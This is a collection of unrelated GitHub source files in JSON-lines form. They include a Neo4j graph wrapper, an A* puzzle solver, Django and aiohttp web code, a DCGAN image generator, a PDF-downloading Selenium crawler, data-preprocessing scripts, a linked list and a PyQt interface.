self.shortest_path_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.identifier_property\n )\n\n result = [row[\"node\"] for row in session.run(query, params)]\n return result\n\n connected_components_query = \"\"\"\\\n CALL algo.unionFind.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, setId\n MATCH (n) WHERE id(n) = nodeId\n RETURN setId, collect(n.`%s`) AS nodes\n \"\"\"\n\n def connected_components(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.connected_components_query % self.identifier_property\n\n for row in session.run(query, params):\n yield set(row[\"nodes\"])\n\n def base_params(self):\n return {\n \"direction\": self.direction,\n \"nodeLabel\": self.node_label,\n \"relationshipType\": self.relationship_type,\n \"graph\": self.graph\n }\n","repo_name":"ReinhardHsu/networkx-neo4j","sub_path":"nxneo4j/base_graph.py","file_name":"base_graph.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"22682067871","text":"import heapq\nimport copy\nimport datetime\n\nGOAL = [[1, 5, 9, 13], [2, 6, 10, 14], [3, 7, 11, 15], [4, 8, 12, 0]]\nBLOCK = []\n# the four move directions\ndirection = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n\n# the OPEN list\nOPEN = []\n\n# total number of expanded nodes\nSUM_NODE_NUM = 0\n\n\n# state node\nclass State(object):\n def __init__(self, gn=0, hn=0, state=None, hash_value=None, par=None):\n '''\n Initialization\n :param gn: distance from the initial state to this node\n :param hn: heuristic distance\n :param state: the board state stored in the node\n :param hash_value: hash value, used for duplicate detection\n :param par: pointer to the parent node\n '''\n self.gn = gn\n self.hn = hn\n self.fn = self.gn + self.hn\n self.child = [] # child nodes\n self.par = par # parent node\n self.state = state # board state\n self.hash_value = hash_value # hash value\n\n def __lt__(self, other): # 
used for heap comparison; returns the node with the smaller fn\n return self.fn < other.fn\n\n def __eq__(self, other): # equality check\n return self.hash_value == other.hash_value\n\n def __ne__(self, other): # inequality check\n return not self.__eq__(other)\n\n\ndef manhattan_dis(cur_node, end_node):\n '''\n Compute the Manhattan distance\n :param cur_state: the current state\n :return: Manhattan distance to the goal state\n '''\n cur_state = cur_node.state\n end_state = end_node.state\n dist = 0\n N = len(cur_state)\n for i in range(N):\n for j in range(N):\n if cur_state[i][j] == end_state[i][j]:\n continue\n num = cur_state[i][j]\n if num == 0:\n x = N - 1\n y = N - 1\n else:\n x = num // N # theoretical row index (integer division, not Python 2's /)\n y = num - N * x - 1 # theoretical column index\n dist += (abs(x - i) + abs(y - j))\n\n return dist\n\n\ndef test_fn(cur_node, end_node):\n return 0\n\n\ndef generate_child(cur_node, end_node, hash_set, open_table, dis_fn):\n '''\n Generate child nodes\n :param cur_node: the current node\n :param end_node: the goal-state node\n :param hash_set: hash set, used for duplicate detection\n :param open_table: the OPEN list\n :param dis_fn: distance function\n :return: None\n '''\n if cur_node == end_node:\n heapq.heappush(open_table, end_node)\n return\n num = len(cur_node.state)\n for i in range(0, num):\n for j in range(0, num):\n if cur_node.state[i][j] != 0:\n continue\n for d in direction: # the four offset directions\n x = i + d[0]\n y = j + d[1]\n if x < 0 or x >= num or y < 0 or y >= num: # out of bounds\n continue\n # count the expanded nodes\n global SUM_NODE_NUM\n SUM_NODE_NUM += 1\n\n state = copy.deepcopy(cur_node.state) # copy the parent's state\n state[i][j], state[x][y] = state[x][y], state[i][j] # swap positions\n h = hash(str(state)) # convert to a string before hashing\n if h in hash_set: # duplicate\n continue\n hash_set.add(h) # add to the hash set\n gn = cur_node.gn + 1 # distance travelled so far\n hn = dis_fn(cur_node, end_node) # heuristic distance\n node = State(gn, hn, state, h, cur_node) # create a new node\n cur_node.child.append(node) # append to the children\n heapq.heappush(open_table, node) # push onto the heap\n\n\ndef getOperate(s, p):\n \"\"\"\n :param p: parent state\n :param s: child state\n :return: the move direction: 'up', 'down', 'left' or 'right'\n \"\"\"\n i = 0\n j = 0\n for i in range(4):\n for j in range(4):\n if p[i][j] == 0:\n break\n if p[i][j] == 0:\n break\n if i > 0 and s[i - 1][j] == 0:\n return 'left'\n elif i < 3 and s[i + 1][j] == 0:\n return 'right'\n elif j > 0 and s[i][j - 1] == 0:\n return 'up'\n elif j < 3 and s[i][j + 1] == 0:\n return 'down'\n\n\ndef print_path(node):\n '''\n Collect the path\n :param node: the final node\n :return: list of moves\n '''\n num = node.gn\n\n # def show_block(block):\n # print(\"---------------\")\n # for b in block:\n # print(b)\n\n stack = [] # simulates a stack\n while node.par is not None:\n stack.append(getOperate(node.state,node.par.state))\n node = node.par\n return stack\n\n\ndef A_start(start, end, distance_fn, generate_child_fn, time_limit=10):\n '''\n A* algorithm\n :param start: the initial state\n :param end: the goal state\n :param distance_fn: distance function; a custom one may be used\n :param generate_child_fn: function that generates child nodes\n :param time_limit: time limit, 10 seconds by default\n :return: None\n '''\n root = State(0, 0, start, hash(str(BLOCK)), None) # root node\n end_state = State(0, 0, end, hash(str(GOAL)), None) # goal node\n if root == end_state:\n print(\"start == end !\")\n\n OPEN.append(root)\n heapq.heapify(OPEN)\n\n node_hash_set = set() # stores the hash values of the nodes\n node_hash_set.add(root.hash_value)\n start_time = datetime.datetime.now()\n while len(OPEN) != 0:\n top = heapq.heappop(OPEN)\n if top == end_state: # goal reached, output the path\n print(\"OK!\")\n return 1,print_path(top)\n # generate child nodes and add them to the OPEN list\n generate_child_fn(cur_node=top, end_node=end_state, hash_set=node_hash_set,\n open_table=OPEN, dis_fn=distance_fn)\n cur_time = datetime.datetime.now()\n # timeout handling\n # if (cur_time - start_time).seconds > time_limit:\n # print(\"Time running out, break !\")\n # print(\"Number of nodes:\", SUM_NODE_NUM)\n # 
return -1\n\n print(\"No road !\") # no path found\n return -1,0\n\n\ndef getPath(block):\n global OPEN,SUM_NODE_NUM\n OPEN = [] # don't forget to clear this here\n global BLOCK\n BLOCK = block\n # BLOCK = []\n # BLOCK = [[5, 2, 6, 9], [1, 10, 14, 7], [3, 11, 0, 12], [4, 8, 15, 13]]\n SUM_NODE_NUM = 0\n i = 0\n j = 0\n found = False # locate the blank tile (stored as None) and replace it with 0\n for i in range(4):\n for j in range(4):\n if BLOCK[i][j] is None:\n BLOCK[i][j] = 0\n found = True\n break\n if found:\n break\n print(\"in\",BLOCK)\n start_t = datetime.datetime.now()\n # a 5-second timeout could be handled here; choose the heuristic function to fit the situation\n flag,operate = A_start(BLOCK, GOAL, manhattan_dis, generate_child, time_limit=10)\n end_t = datetime.datetime.now()\n BLOCK[i][j] = None\n print(operate)\n return operate\n#\n# BLOCK = [[1, 5, 10, 9], [2, 6, 0, 13], [3, 7, 11, 14], [4, 8, 12, 15]]\n# op = getPath(BLOCK)","repo_name":"xu-hanwen/BigHub","sub_path":"15-Digital/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"7831250369","text":"from django.db import models\nfrom account.models import Account\nfrom category.models import Category\n\n# Create your models here.\n\nclass Transaction(models.Model):\n account = models.ForeignKey(Account, null=False, db_index=True, on_delete=models.CASCADE)\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=False)\n description = models.CharField(null=False, blank=True, max_length=255)\n note = models.TextField(null=True, blank=True)\n date = models.DateTimeField(null=False)\n category = models.ForeignKey(Category, null=False, default=\"UNCATEGORIZED\", db_index=True, on_delete=models.CASCADE)\n is_reccuring = models.BooleanField(default=False)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n \n class Meta:\n indexes = [\n models.Index(fields=['account'], name='index_transactions_on_account')\n ]","repo_name":"ipierre3/Personal-Finance-App","sub_path":"backend/transaction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34764189482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 7 19:21:28 2022\r\n\r\n@author: bkmcc\r\n\"\"\"\r\n\"\"\" module to load the County data from Colorado \"\"\"\r\n\r\n\r\n\r\n\r\nimport os\r\nimport requests\r\nimport pandas as pd\r\ndef load_CO_county_data(Logger):\r\n \"\"\"function to load county lat / long data \"\"\"\r\n\r\n co_pathName = os.getcwd()\r\n co_fileName = \"Colorado_County_Boundaries.csv\"\r\n Logger.info(f\"CO county data - start load\")\r\n Logger.debug(f\"filepath = {co_pathName}\")\r\n\r\n files = [file for file in os.listdir(os.getcwd())]\r\n\r\n if co_fileName not in files:\r\n print(f\"Colorado County file not in folder. 
Please remedy!!\")\r\n raise AttributeError\r\n co_DF = pd.read_csv(os.path.join(co_pathName, co_fileName))\r\n co_DF = co_DF[[\"COUNTY\", \"CENT_LAT\", \"CENT_LONG\"]]\r\n\r\n co_DF['COUNTY'] = co_DF['COUNTY'].str.lower()\r\n\r\n Logger.debug(f\"CO county data - data loaded / return to MAIN\")\r\n\r\n return co_DF\r\n","repo_name":"efugikawa/3006_final","sub_path":"FP_CO_county_load.py","file_name":"FP_CO_county_load.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27874720135","text":"import functools\nimport time\nimport uuid\n\nimport aiohttp_jinja2\nimport voluptuous as vol\nfrom aiohttp import web\n\nfrom pymash import db\nfrom pymash import events\nfrom pymash import loggers\nfrom pymash import models\nfrom pymash import type_aliases as ta\nfrom pymash import utils\n\n_COOKIE_VISITED = 'visited'\n\n_CACHE_LEADERS_IN_SECONDS = 5\n\n\ndef _cache_coroutine_by_time(seconds):\n def decorator(view):\n cache = {}\n\n async def cached_view(*args, **kwargs):\n now = _floor_to_full_nearest_multiply(int(time.time()), seconds)\n if now not in cache:\n loggers.web.info('%s cache miss', view.__name__)\n cache.clear()\n result = await view(*args, **kwargs)\n cache[now] = result\n else:\n loggers.web.info('%s cache hit', view.__name__)\n return cache[now]\n\n return functools.update_wrapper(cached_view, view)\n\n return decorator\n\n\n@utils.log_time(loggers.web)\n@aiohttp_jinja2.template('leaders.html')\nasync def show_leaders(request: web.Request) -> ta.DictOrResponse:\n repos = await _cached_find_active_repos(request)\n return {\n 'repos': repos,\n }\n\n\n@_cache_coroutine_by_time(_CACHE_LEADERS_IN_SECONDS)\nasync def _cached_find_active_repos(request):\n repos = await db.find_active_repos_order_by_rating(request.app['db_engine'])\n return repos\n\n\nclass _PostGameInput:\n valid_id = vol.And(str, vol.Coerce(int))\n valid_score = vol.And(str, vol.Coerce(int))\n\n class Keys:\n white_id = 'white_id'\n black_id = 'black_id'\n white_score = 'white_score'\n black_score = 'black_score'\n hash_ = 'hash'\n\n schema = vol.Schema(\n {\n Keys.white_id: valid_id,\n Keys.black_id: valid_id,\n Keys.white_score: valid_score,\n Keys.black_score: valid_score,\n Keys.hash_: str,\n },\n required=True, extra=vol.ALLOW_EXTRA)\n\n\n@utils.log_time(loggers.web)\nasync def post_game(request: web.Request) -> web.Response:\n data = await request.post()\n game = await _get_game_or_error(request, data)\n _validate_hash(request, game, data[_PostGameInput.Keys.hash_])\n await events.post_game_finished_event(request, game)\n redirect_url = request.app.router['new_game'].url_for()\n return web.HTTPFound(redirect_url)\n\n\nasync def _get_game_or_error(request, data) -> models.Game:\n try:\n parsed_input = _PostGameInput.schema(dict(data))\n except vol.Invalid:\n loggers.web.info('bad request for post_game', exc_info=True)\n raise web.HTTPBadRequest\n keys = _PostGameInput.Keys\n try:\n result = models.GameResult(\n white_score=parsed_input[keys.white_score],\n black_score=parsed_input[keys.black_score])\n return models.Game(\n game_id=request.match_info['game_id'],\n white_id=parsed_input[keys.white_id],\n black_id=parsed_input[keys.black_id],\n result=result)\n except (models.ResultError, models.GameError):\n loggers.web.info('bad request for post_game', exc_info=True)\n raise web.HTTPBadRequest\n\n\ndef _validate_hash(request: web.Request, game: models.Game, actual_hash: str):\n expected_hash = 
game.get_hash(request.app['config'].game_hash_salt)\n if expected_hash != actual_hash:\n loggers.web.info('game hash mismatch: %r != %r', actual_hash, expected_hash)\n raise web.HTTPBadRequest\n\n\ndef _set_visited_cookie(view):\n async def wrapper(request):\n response = await view(request)\n response.set_cookie(_COOKIE_VISITED, '1')\n return response\n\n return functools.update_wrapper(wrapper, view)\n\n\n@utils.log_time(loggers.web)\n@_set_visited_cookie\n@aiohttp_jinja2.template('game.html')\nasync def show_game(request: web.Request) -> ta.DictOrResponse:\n white, black = await _find_two_random_functions_or_error(request.app['db_engine'])\n game = models.Game(\n game_id=uuid.uuid4().hex,\n white_id=white.function_id,\n black_id=black.function_id,\n result=models.UNKNOWN_RESULT)\n return {\n 'game': game,\n 'white': white,\n 'black': black,\n 'has_already_visited': (_COOKIE_VISITED in request.cookies),\n }\n\n\nasync def _find_two_random_functions_or_error(engine: ta.AsyncEngine):\n num_tries = 3\n for _ in range(num_tries):\n functions = await db.try_to_find_two_random_functions(engine)\n if _are_valid_functions(functions):\n return functions\n else:\n loggers.web.info('could not find two random functions with %d tries', num_tries)\n raise web.HTTPServiceUnavailable\n\n\ndef _are_valid_functions(functions: ta.Functions) -> bool:\n if len(functions) != 2:\n return False\n white, black = functions\n if white.repo_id == black.repo_id:\n return False\n return True\n\n\ndef _floor_to_full_nearest_multiply(x, n):\n return (x // n) * n\n","repo_name":"alexandershov/pymash","sub_path":"src/pymash/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24410443935","text":"import os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom torch.autograd import Variable\nfrom PIL import Image\nimport sys\n\n# Set random seed for reproducibility\nmanualSeed = 999\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\nnp.random.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\n# Root directory for dataset\nmodel_path = sys.argv[1]\noutput_dir = sys.argv[2]\nos.makedirs(output_dir, exist_ok=True)\n\noutput_size = 28\n\ntfm = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize(output_size)])\n\n# Number of channels in the training images. For color images this is 3\nnc = 3\n\n# Size of z latent vector (i.e. 
size of generator input)\nnz = 100\n\n# Size of feature maps in generator\nngf = 80\n\n# Size of feature maps in discriminator\nndf = 80\n\n# Number of classes\nnum_label = 10\n \ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\n\n# custom weights initialization called on netG and netD\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\nclass Generator(nn.Module):\n def __init__(self, nz=nz, ngf=ngf):\n super(Generator, self).__init__()\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(inplace=True),\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(inplace=True),\n # state size. (ngf*4) x 8 x 8\n nn.ConvTranspose2d( ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(inplace=True),\n # state size. (ngf*2) x 16 x 16\n nn.ConvTranspose2d( ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(inplace=True),\n # state size. (ngf) x 32 x 32\n nn.ConvTranspose2d( ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 64 x 64\n )\n \n def forward(self, input):\n return self.main(input)\n\n# Load model\nnetG = Generator(nz)\nnetG.load_state_dict(torch.load(model_path))\nnetG.eval()\nnetG.to(device)\n\n# Create 1000 latent vectors and embed label inside\nnum_sample = 1000\nnum_per_class = 100\nfixed_noise = torch.FloatTensor(num_sample, nz, 1, 1).normal_(0, 1)\nfixed_noise = Variable(fixed_noise).to(device)\nfixed_noise_ = np.random.normal(0, 1, (num_sample, nz))\nlabel = np.array([x * np.ones(num_per_class) for x in range(num_label)], dtype=np.int32).flatten()\nlabel_onehot = np.zeros((num_sample, num_label))\nlabel_onehot[np.arange(num_sample), label] = 1\nfixed_noise_[np.arange(num_sample), :num_label] = label_onehot[np.arange(num_sample)]\n\nfixed_noise_ = (torch.from_numpy(fixed_noise_))\nfixed_noise_ = fixed_noise_.resize_(num_sample, nz, 1, 1)\nfixed_noise.data.copy_(fixed_noise_)\n\n# Generate 1000 images and save them.\nimgs_sample = (netG(fixed_noise).data + 1) / 2.0 # denormalize\nfor idx, img in enumerate(imgs_sample, 0):\n img_label = idx // num_per_class\n img_idx = idx % num_per_class\n number = str(img_idx+1).zfill(3)\n img = tfm(img)\n img.save(os.path.join(output_dir, f'{img_label}_{number}.png'))\nprint(\"1000 images generated!\")\n","repo_name":"yiwei32/NTU_courses","sub_path":"2021_Fall/DLCV/hw2/p2_test.py","file_name":"p2_test.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22554188022","text":"import sys, os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport urllib\nimport pickle\nfrom tqdm import tqdm\n\n\ndef save_pickle(data, path):\n with open(path, 'wb') as f:\n pickle.dump(data, f)\n\n\nif __name__ == \"__main__\":\n _, output_dir = sys.argv\n \n link = \"https://www.kordi.or.kr/content.do?page=1&sf_category=N107_1&cmsId=173\"\n options = webdriver.ChromeOptions()\n options.add_experimental_option('prefs', {\n \"download.default_directory\": output_dir, #Change default directory for downloads\n \"download.prompt_for_download\": False, #To auto 
download the file\n \"download.directory_upgrade\": True,\n \"plugins.always_open_pdf_externally\": True #It will not show PDF directly in chrome\n })\n driver = webdriver.Chrome(options=options)\n\n num = 1\n docs = []\n while True:\n link = f\"https://www.kordi.or.kr/content.do?page={num}&sf_category=N107_1&cmsId=173\"\n driver.get(link)\n doc_list = driver.find_element(By.TAG_NAME, 'tbody').find_elements(By.TAG_NAME, 'a')\n if len(doc_list) == 0:\n break\n \n [docs.append(doc.get_attribute('href')) for doc in doc_list]\n \n num += 1\n \n save_pickle(docs, f\"./oldman_doc_list.p\") \n \n pdf_list = []\n for doc_link in tqdm(docs, desc='collect pdf link'):\n try:\n driver.get(doc_link)\n pdf = driver.find_element(By.XPATH, '//*[@id=\"sub_contents\"]/article/table/tbody/tr[4]/td').find_elements(By.TAG_NAME, 'a')\n \n [pdf_list.append(i.get_attribute('href')) for i in pdf]\n except:\n print('error doc !!!')\n print(doc_link)\n save_pickle(pdf_list, f\"./oldman_href_list.p\") \n\n [driver.get(pdf) for pdf in tqdm(pdf_list, desc='download pdf')]\n \n os.remove(f\"./oldman_doc_list.p\")\n os.remove(f\"./oldman_href_list.p\")","repo_name":"tkdalsrb123/Alchera","sub_path":"11/1113_db_crawling2/oldman.py","file_name":"oldman.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2066386758","text":"#!/usr/bin/python3\n\"\"\"\nA script that takes in a URL, email and sends POST request to the passed\nURL with the email as parameter and displays the body of the response\ndecoded in utf-8\n\"\"\"\nimport urllib.parse\nimport urllib.request\nimport sys\n\n\ndef post_request(url, email):\n # use parse.urlencode to encode the argument\n data = urllib.parse.urlencode({'email': email})\n # convert it in to bytes\n data = data.encode('ascii')\n # make an object request\n req = urllib.request.Request(url, data)\n\n# Use with to open url response and decode\n with urllib.request.urlopen(req) as response:\n undecoded_body = response.read()\n body = undecoded_body.decode('utf-8')\n print(body)\n\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n email = sys.argv[2]\n post_request(url, email)\n","repo_name":"FrancKenya/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18650615935","text":"#50. Write a Python program that reads two integers representing a month \n# and day and prints the season for that month and day.\n#a. Expected Output:\n#Input the month (e.g. 
January, February etc.): july\n#Input the day: 31\n#Season is autumn\n\nmonth = input(\"enter month: \").strip().lower()\nday = int(input(\"enter day: \"))\nif month == \"march\" or month == \"april\" or month == \"may\":\n    if 1 <= day <= 31:\n        print(\"spring\")\nelif month == \"june\" or month == \"july\" or month == \"august\":\n    if 1 <= day <= 31:\n        print(\"summer\")\nelif month == \"september\" or month == \"october\" or month == \"november\":\n    if 1 <= day <= 31:\n        print(\"autumn\")\nelif month == \"december\" or month == \"january\" or month == \"february\":\n    if 1 <= day <= 31:\n        print(\"winter\")\nelse:\n    print(\"invalid month\")","repo_name":"shanti96/if-else","sub_path":"ifelse50 print season that month and day.py","file_name":"ifelse50 print season that month and day.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"38305399528","text":"import pyudev as udevpy\nimport bluetooth\nimport subprocess as sp\n\ndef checkttyUSB0():\n    print(\"[LiDAR] Checking LiDAR presence\")\n    try:\n        context = udevpy.Context()\n        dev = udevpy.Device.from_device_file(context, '/dev/ttyUSB0')\n        print(\"[LiDAR] LiDAR Present\")\n        print(\"[LiDAR] Device Name = \" + dev.sys_name)\n    except Exception as e:\n        # We weren't able to use pyudev (possibly because of an unsupported operating system)\n        print(\"[WARNING] LiDAR Not Present - \" + str(e))\n    return None\n\ndef checkttyACM0():\n    print(\"[Arduino] Checking Arduino presence\")\n    try:\n        context = udevpy.Context()\n        dev = udevpy.Device.from_device_file(context, '/dev/ttyArduinoProgram')\n        print(\"[Arduino] Arduino Present\")\n        print(\"[Arduino] Device Name = \" + dev.sys_name)\n    except Exception as e:\n        # We weren't able to use pyudev (possibly because of an unsupported operating system)\n        print(\"[WARNING] Arduino Not Present - \" + str(e))\n    return None\n\ndef checkBluetooth():\n    # C8:3F:26:F8:65:E8\n    print(\"[Xbox-Controller] Checking Xbox-Controller presence\")\n    process = sp.Popen(['hcitool', 'con'], stdout=sp.PIPE, stderr=sp.PIPE)\n    out, err = process.communicate()\n    out = out.decode('utf-8', errors='replace')  # communicate() returns bytes\n    print(out)\n    if \"C8:3F:26:F8:65:E8\" in out.split():\n        print(\"[Xbox-Controller] Xbox-one controller is connected\")\n    else:\n        print(\"[Xbox-Controller] The stored Xbox-one controller was not found; other connected devices are listed below\")\n        print(out)\n    return None\n\ncheckttyUSB0()\ncheckttyACM0()\ncheckBluetooth()","repo_name":"furhadjidda/astro","sub_path":"raspberry_pi/src/astro_base/script/astro_diagnotics.py","file_name":"astro_diagnotics.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12913916602","text":"class LinkedListNode:\n    def __init__(self, data):\n        self.data = data\n        self.next_node = None\n    \n    def __str__(self):\n        return str(self.data)\n\n    def insert_after(self, data):\n        temp = self.next_node\n        self.next_node = new_node = LinkedListNode(data)\n        new_node.next_node = temp\n\nclass SinglyLinkedList:\n    def __init__(self, head = None, values = None, sort = True):\n        self.head = head\n        self.tail = head\n        self.values = values\n        if self.values:\n            if sort:\n                self.insert_values_in_order()\n            else:\n                self.insert_values()\n\n    def insert(self, data):\n        if not self.head:\n            self.head = self.tail = LinkedListNode(data)\n        else:\n            self.tail.next_node = self.tail = LinkedListNode(data)\n    \n    def insert_values(self):\n        for value in self.values:\n            
self.insert(value)\n\n def delete(self, data):\n if self.head.data == data:\n self.head = self.head.next_node\n else:\n node = self.head\n previous = None\n while node.data != data:\n previous = node\n node = node.next_node\n previous.next_node = node.next_node\n\n def search(self, data):\n node = self.head\n while node.next_node:\n if node.data == data:\n return node\n node = node.next_node\n raise Exception(\"Data not found\")\n\n def insert_in_order(self, data):\n node = self.head\n print(data)\n if not self.head:\n self.head = LinkedListNode(data)\n elif self.head.data >= data:\n self.head = LinkedListNode(data)\n self.head.next_node = node\n else:\n while node.next_node:\n if node.next_node.data >= data:\n node.insert_after(data)\n return\n node = node.next_node\n node.next_node = LinkedListNode(data)\n \n def insert_values_in_order(self):\n for value in self.values:\n self.insert_in_order(value)\n\n def __repr__(self):\n if self.head:\n node = self.head\n node_string = str(node.data)\n while node.next_node:\n node_string = node_string + f\" => {node.next_node.data}\"\n node = node.next_node\n return node_string\n return \"None\"\n\ndef test_insert_in_order():\n ll = SinglyLinkedList()\n ll_2 = SinglyLinkedList()\n vals = [1,5,3,2,4,5]\n\n ll.insert_in_order(1)\n print(ll)\n assert ll.__repr__() == '1'\n\n ll.insert_in_order(3)\n print(ll)\n assert ll.__repr__() == '1 => 3'\n\n ll.insert_in_order(4)\n print(ll)\n assert ll.__repr__() == '1 => 3 => 4'\n\n ll.insert_in_order(2)\n print(ll)\n assert ll.__repr__() == '1 => 2 => 3 => 4'\n\n ll.insert_in_order(0)\n print(ll)\n assert ll.__repr__() == '0 => 1 => 2 => 3 => 4'\n\n ll.insert_in_order(-1)\n print(ll)\n assert ll.__repr__() == '-1 => 0 => 1 => 2 => 3 => 4'\n\n from random import randint\n\n for num in [chr(randint(60,90)) for num in range(40)]:\n ll_2.insert_in_order(num)\n\n head = ll_2.head\n while head.next_node:\n assert head.next_node.data >= head.data\n head = head.next_node\n \n print(ll_2)\n\ntest_insert_in_order()","repo_name":"bibbycodes/data_structures","sub_path":"lib/ds/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4685865655","text":"import numpy as np\nimport pandas as pd\nimport plotly as p\n\nfrom configurations import FILTERED, VACINA\nfrom utils import join\nfrom graphs import bar, stacked_area, overlaid_area\n\ndef grafico_areas_empilhadas(df):\n semana_aplicaca_por_vacina = \\\n df.groupby(by=['Semana de aplicação', 'Nome da vacina', 'Estado']).apply(\n lambda e: pd.DataFrame({'Total (semana)': [len(e)]})).reset_index()\n\n #print(\"original\", semana_aplicaca_por_vacina)\n semana_aplicaca_por_vacina = semana_aplicaca_por_vacina[\n ['Estado', 'Semana de aplicação', 'Total (semana)', 'Nome da vacina']]\n\n semana_aplicaca_por_vacina.to_csv(\"areas_empilhadas.csv\", index=False)\n\ndef grafico_total_vacinas_tipo_dose(df):\n # df = pd.concat([df, pd.DataFrame(\n # {'Semana de aplicação': [i for i in range(30)], 'Dose': ['Vacinação completa'] * 30})], sort=True,\n # ignore_index=True)\n # df = pd.concat([df, pd.DataFrame(\n # {'Semana de aplicação': [i for i in range(30)], 'Dose': ['Primeira dose'] * 30})], sort=True,\n # ignore_index=True)\n semana_aplicacao_dose = df.groupby(by=['Estado', 'Semana de aplicação', 'Dose']).apply(\n lambda e: pd.DataFrame({'Total (semana)': [len(e)]})).reset_index()[\n ['Estado', 'Semana de aplicação', 'Dose', 'Total 
(semana)']]\n\n semana_aplicacao_dose.to_csv(\"total_dose.csv\", index=False)\n\nif __name__ == \"__main__\":\n\n file = \"vacina_preprocessado.csv\"\n saida = \"vacina_preprocessado_2.csv\"\n n = 0\n # ['Dose', 'Semana de aplicação', 'Nome da vacina', 'Estado]\n df = pd.read_csv(file, encoding='UTF-8')\n\n #grafico_areas_empilhadas(df)\n\n grafico_total_vacinas_tipo_dose(df)\n","repo_name":"claudiovaliense/visualizacao_covid","sub_path":"capanema/2_pre_processing.py","file_name":"2_pre_processing.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8952057701","text":"import sys, math\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QPushButton,\n QLabel, QWidget, QHBoxLayout, QVBoxLayout,\n QListWidget, QFileDialog, QGroupBox,\n QRadioButton)\nfrom PyQt5.QtGui import QIcon, QPixmap, QImage , QPainter,QBrush, QPen, QFont, QPalette, QColor\nfrom PyQt5.QtCore import Qt, QRect, QPoint, QTimer, QObject\nfrom cv2 import imread, resize, cvtColor, COLOR_BGR2RGB\nfrom Libs.data import *\nfrom Libs.util import *\nimport os\n\nlabel_item_len=11\nstatue = [False for i in range(label_item_len)]\n\n\nclass human_attrition_ui(QWidget):\n def __init__(self, parent=None):\n super(human_attrition_ui, self).__init__(parent)\n self.face_attri = [\"Blackhair\", \"Blury\", \"Eyeglass\", \"Male\", \"Smile\", \"Younge\"]\n self.huamn_attri = [\"gender\", \"hat\", \"backpack\", \"bag\", \"age\"]\n self.sum_attribute = self.face_attri + self.huamn_attri\n self.huamn_attri_buttons = []\n self.label_item_len = len(self.face_attri) + len(self.huamn_attri)\n\n self.initUI()\n\n def initUI(self):\n self.face_layput = QVBoxLayout()\n\n palette = QPalette()\n palette.setColor(QPalette.WindowText, QColor(128, 0, 0))\n face = QLabel(\"Face Attribute:\")\n face.setFont(QFont(\"Face\", 10, QFont.Bold))\n face.setPalette(palette)\n\n human = QLabel(\"Body Attribute\")\n human.setFont(QFont(\"Face\", 10, QFont.Bold))\n human.setPalette(palette)\n\n 